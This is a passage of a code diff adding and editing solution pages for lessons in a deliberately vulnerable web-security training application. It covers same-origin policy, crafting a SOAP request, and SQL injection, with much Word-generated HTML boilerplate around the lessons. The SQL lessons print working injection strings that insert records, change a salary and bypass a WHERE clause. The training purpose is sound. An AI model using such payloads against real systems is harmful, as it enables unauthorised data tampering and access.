UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:"MS Mincho";
panose-1:2 2 6 9 4 2 5 8 3 4;
mso-font-alt:"\FF2D\FF33 \660E\671D";
mso-font-charset:128;
mso-generic-font-family:modern;
mso-font-pitch:fixed;
mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;
mso-font-charset:0;
mso-generic-font-family:roman;
mso-font-pitch:variable;
mso-font-signature:-1610611985 1107304683 0 0 159 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
@font-face
{font-family:"\@MS Mincho";
panose-1:2 2 6 9 4 2 5 8 3 4;
mso-font-charset:128;
mso-generic-font-family:modern;
mso-font-pitch:fixed;
mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";}
h1
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-link:"Heading 1 Char";
mso-style-next:Normal;
margin-top:12.0pt;
margin-right:0cm;
margin-bottom:3.0pt;
margin-left:0cm;
mso-pagination:widow-orphan;
page-break-after:avoid;
mso-outline-level:1;
font-size:16.0pt;
font-family:"Arial","sans-serif";
mso-fareast-font-family:"MS Mincho";
mso-font-kerning:16.0pt;
mso-fareast-language:JA;
font-weight:bold;}
h2
{mso-style-noshow:yes;
mso-style-priority:9;
mso-style-qformat:yes;
mso-style-link:"Heading 2 Char";
mso-style-next:Normal;
margin-top:10.0pt;
margin-right:0cm;
margin-bottom:0cm;
margin-left:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan lines-together;
page-break-after:avoid;
mso-outline-level:2;
font-size:13.0pt;
font-family:"Cambria","serif";
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:major-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:major-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;
color:#4F81BD;
mso-themecolor:accent1;
font-weight:bold;}
p.MsoCaption, li.MsoCaption, div.MsoCaption
{mso-style-noshow:yes;
mso-style-qformat:yes;
mso-style-next:Normal;
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";
font-weight:bold;}
p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
{mso-style-noshow:yes;
mso-style-priority:99;
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;}
a:link, span.MsoHyperlink
{mso-style-noshow:yes;
color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-noshow:yes;
mso-style-priority:99;
color:purple;
mso-themecolor:followedhyperlink;
text-decoration:underline;
text-underline:single;}
p
{mso-style-noshow:yes;
mso-margin-top-alt:auto;
margin-right:0cm;
mso-margin-bottom-alt:auto;
margin-left:0cm;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";}
pre
{mso-style-noshow:yes;
mso-style-priority:99;
mso-style-link:"HTML Preformatted Char";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
font-size:10.0pt;
font-family:"Courier New";
mso-fareast-font-family:"Times New Roman";}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
mso-style-priority:99;
mso-style-link:"Balloon Text Char";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:"Tahoma","sans-serif";
mso-fareast-font-family:"Times New Roman";}
span.Heading1Char
{mso-style-name:"Heading 1 Char";
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Heading 1";
mso-ansi-font-size:16.0pt;
mso-bidi-font-size:16.0pt;
font-family:"MS Mincho";
mso-ascii-font-family:"MS Mincho";
mso-fareast-font-family:"MS Mincho";
mso-hansi-font-family:"MS Mincho";
mso-bidi-font-family:Arial;
mso-font-kerning:16.0pt;
mso-fareast-language:JA;
font-weight:bold;}
span.Heading2Char
{mso-style-name:"Heading 2 Char";
mso-style-noshow:yes;
mso-style-priority:9;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Heading 2";
mso-ansi-font-size:13.0pt;
mso-bidi-font-size:13.0pt;
font-family:"Cambria","serif";
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:major-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:major-latin;
color:#4F81BD;
mso-themecolor:accent1;
font-weight:bold;}
span.HTMLPreformattedChar
{mso-style-name:"HTML Preformatted Char";
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"HTML Preformatted";
font-family:"Courier New";
mso-ascii-font-family:"Courier New";
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:"Courier New";
mso-bidi-font-family:"Courier New";}
span.BalloonTextChar
{mso-style-name:"Balloon Text Char";
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Balloon Text";
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:"Tahoma","sans-serif";
mso-ascii-font-family:Tahoma;
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-size:10.0pt;
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
mso-ascii-font-family:Arial;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Arial;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;}
@page Section1
{size:595.3pt 841.9pt;
margin:70.55pt 56.9pt 70.55pt 56.9pt;
mso-header-margin:35.3pt;
mso-footer-margin:35.3pt;
mso-title-page:yes;
mso-paper-source:0;}
div.Section1
{page:Section1;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Arial","sans-serif";
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="4098"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>
<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
<div class=Section1>
<p class=MsoNormal><b>Lesson
Plan Title:</b><span style='font-family:"Arial","sans-serif"'> Same Origin Policy Protection. <o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>A key element of AJAX is the XMLHttpRequest (XHR), which allows javascript to make asynchronous calls from the client side to a server. However, as a security measure these requests may only be made to the server from which the client page originated. <o:p></o:p></span></p>
<b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
<p class=MsoNormal></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This exercise demonstrates the Same Origin Policy Protection. XHR requests can only be passed back to the originating server. Attempts to pass data to a non-originating server will fail.<br style='mso-special-character:line-break'>
<![if !supportLineBreakNewLine]>
<![endif]><o:p></o:p></span></p>
<b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click both of the links on the page to see their behavior and complete the lesson. <o:p></o:p></span></p>
<b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;&nbsp;</o:p></span></b>
<p class=MsoNormal><o:p>&nbsp;</o:p></p>
</div>
</body>
</html>

3
src/main/webapp/lesson_solutions/SilentTransactions.html
View File

@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Silent Transcations Attacks</title>
<link rel=File-List href="lesson_solutions/SilentTransactions_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/SilentTransactions_files/editdata.mso">
<!--[if !mso]>
@ -693,7 +694,6 @@ transferring money. Examining the HTML source reveals that two JavaScript
functions are being used:<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;script&gt;<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>function
@ -839,7 +839,6 @@ style='mso-tab-count:4'>
style='mso-spacerun:yes'>        </span>}}}<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;/script&gt;<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The function

41
src/main/webapp/lesson_solutions/SoapRequest.html
View File

@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Create a SOAP Request</title>
<link rel=File-List href="lesson_solutions/SoapRequest_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/SoapRequest_files/editdata.mso">
<!--[if !mso]>
@ -775,30 +776,20 @@ HTTP Request with WebScarab and click on the
<ol style='margin-top:0cm' start=1 type=1>
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
style='font-family:"Arial","sans-serif"'>Change the POST header to open
the SoapRequest. <o:p></o:p></span></li>
the SoapRequest: <br/>
POST http://localhost/webgoat/services/SoapRequest HTTP/1.1 <b>(This will vary based on which ports you are using)</b><o:p></o:p></span></li>
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
style='font-family:"Arial","sans-serif"'>Change the Content-Type to
text/xml. <o:p></o:p></span></li>
text/xml:<br/>
Content-Type: text/xml <o:p></o:p></span></li>
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
style='font-family:"Arial","sans-serif"'>Add a header SOAPAction. <o:p></o:p></span></li>
style='font-family:"Arial","sans-serif"'>Add a header SOAPAction.<br/>
SOAPAction: <b>(No value needs to be specified for this header)</b> <o:p></o:p></span></li>
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
style='font-family:"Arial","sans-serif"'>Append the XML envelope to the
request<o:p></o:p></span></li>
request:<o:p></o:p></span></li>
</ol>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>POST
http://neo:80services/SoapRequest HTTP/1.1<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>Content-Type:
text/xml<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>SOAPAction:
<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>&lt;?xml
version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt; <o:p></o:p></span></p>
@ -834,6 +825,20 @@ style='mso-spacerun:yes'>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>&lt;/SOAP-ENV:Envelope&gt;<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p><br/>It is important that there is no whitespace (carriage returns or spaces) from the SOAPAction header to the opening XML tag. This generates an error instead of the desired response.</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><img
src="lesson_solutions/SoapRequest_files/image011.jpg"></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> Updated HTTP request with SOAP parameters<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The response
@ -850,7 +855,7 @@ src="lesson_solutions/SoapRequest_files/image010.jpg" v:shapes="Picture_x0020_17
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
style='mso-no-proof:yes'>6</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> Intercept response<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>

BIN
src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 156 KiB

43
src/main/webapp/lesson_solutions/SqlAddData.html Normal file
View File

@ -0,0 +1,43 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: Modify Data with SQL</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Add Data with SQL</p>
<p><b>Concept / Topic To Teach:</b><br/>
SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
<br><br>
Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.<br>
<br>
It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.<br>
<br>
</p>
<p><b>General Goal(s):</b><br/>
The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to add a record to the table.
</p>
<b>Solution:</b><br/><br/>
In this lesson, we will use the INSERT query, which uses the format:<br/>
<b>INSERT INTO table VALUES (value1, value2);</b><br/><br/>
In this case, the salaries table has two relevant columns: column 1 is userid, and column 2 is salary.
We will use the command:<br/>
<b>INSERT INTO salaries VALUES ('rlupin',140000);</b> <br/><br/>
This, however, will not work correctly. We are inserting this in between two single quotes in the command:<br/>
SELECT * FROM salaries WHERE userid='<b><font color="blue">userid</font></b>';<br/><br/>
If we treated this lesson as we have treated the previous one, our command would look like this:<br/>
SELECT * FROM salaries WHERE userid='<b><font color="blue">whatever'; INSERT INTO salaries VALUES ('rlupin',150000);</font></b>'<br/><br/>
The statement cannot end with a single quote after the semicolon, so we must comment out the quote using <b>--</b>.<br/>
To complete this lesson, type the following into the field and press go:<br/>
<b>whatever'; INSERT INTO salaries VALUES ('rlupin',140000);--</b><br/><br/>
If you then search for the userid rlupin, you will see there is new record.<br/><br/>
<img src="lesson_solutions/SqlAddData_files/image001.jpg"><br/>
<font size="2"><b>New employee record after using an INSERT query.</b></font><br/><br/><br/>
</body>
</html>

BIN
src/main/webapp/lesson_solutions/SqlAddData_files/image001.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 93 KiB

39
src/main/webapp/lesson_solutions/SqlModifyData.html Normal file
View File

@ -0,0 +1,39 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: Modify Data with SQL</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Modify Data with SQL</p>
<p><b>Concept / Topic To Teach:</b><br/>
SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
<br><br>
Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.<br>
<br>
It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.<br>
<br>
</p>
<p><b>General Goal(s):</b><br/>
The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to modify the salary for userid jsmith.
</p>
<b>Solution:</b><br/><br/>
In this lesson, instead of using the SELECT query command, we use the UPDATE command, which uses the format:<br/>
<b>UPDATE table SET column=value WHERE column=value;</b><br/><br/>
We need to update the table <b>salaries</b>, setting the <b>salary</b> column to a new number.<br/>
We will use the command:<br/>
<b>UPDATE salaries SET salary=999999 WHERE userid='jsmith'</b> <br/><br/>
We also need to end the previous query and leave our last quote open to make a valid statment.<br/>
To complete this lesson, type the following into the field and press go:<br/>
<b>whatever'; UPDATE salaries SET salary=999999 WHERE userid='jsmith</b><br/><br/>
If you then search for the userid jsmith, you will see the salary has been updated.<br/><br/>
<img src="lesson_solutions/SqlModifyData_files/image001.jpg"><br/>
<font size="2"><b>Updated salary after using a MODIFY query.</b></font><br/><br/><br/>
</body>
</html>

BIN
src/main/webapp/lesson_solutions/SqlModifyData_files/image001.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 95 KiB

3
src/main/webapp/lesson_solutions/SqlStringInjection.html
View File

@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: SQL String Injection</title>
<link rel=File-List href="lesson_solutions/SqlStringInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/SqlStringInjection_files/editdata.mso">
<!--[if !mso]>
@ -671,7 +672,7 @@ used in this lesson is: SELECT * FROM user_data WHERE last_name = 'Your Name'<o:
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Enter for the
last name value: Erwin' OR '1'='1 <o:p></o:p></span></p>
last name value: <b>Erwin' OR '1'='1</b> <o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>

1
src/main/webapp/lesson_solutions/WeakAuthenticationCookie.html
View File

@ -10,6 +10,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Spoof an Authentication Cookie</title>
<link rel=File-List href="lesson_solutions/WeakAuthenticationCookie_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WeakAuthenticationCookie_files/editdata.mso">
<!--[if !mso]>

920
src/main/webapp/lesson_solutions/WeakSessionID.html
View File

@ -1,888 +1,90 @@
<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns="http://www.w3.org/TR/REC-html40">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="lesson_solutions/WeakSessionID_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WeakSessionID_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author>egeirnaert</o:Author>
<o:LastAuthor>egeirnaert</o:LastAuthor>
<o:Revision>3</o:Revision>
<o:TotalTime>27</o:TotalTime>
<o:Created>2007-07-11T10:54:00Z</o:Created>
<o:LastSaved>2007-07-12T15:30:00Z</o:LastSaved>
<o:Pages>3</o:Pages>
<o:Words>469</o:Words>
<o:Characters>2677</o:Characters>
<o:Company> </o:Company>
<o:Lines>22</o:Lines>
<o:Paragraphs>6</o:Paragraphs>
<o:CharactersWithSpaces>3140</o:CharactersWithSpaces>
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="lesson_solutions/WeakSessionID_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/WeakSessionID_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:DontVertAlignCellWithSp/>
<w:DontBreakConstrainedForcedTables/>
<w:DontVertAlignInTxbx/>
<w:Word11KerningPairs/>
<w:CachedColBalance/>
</w:Compatibility>
<w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
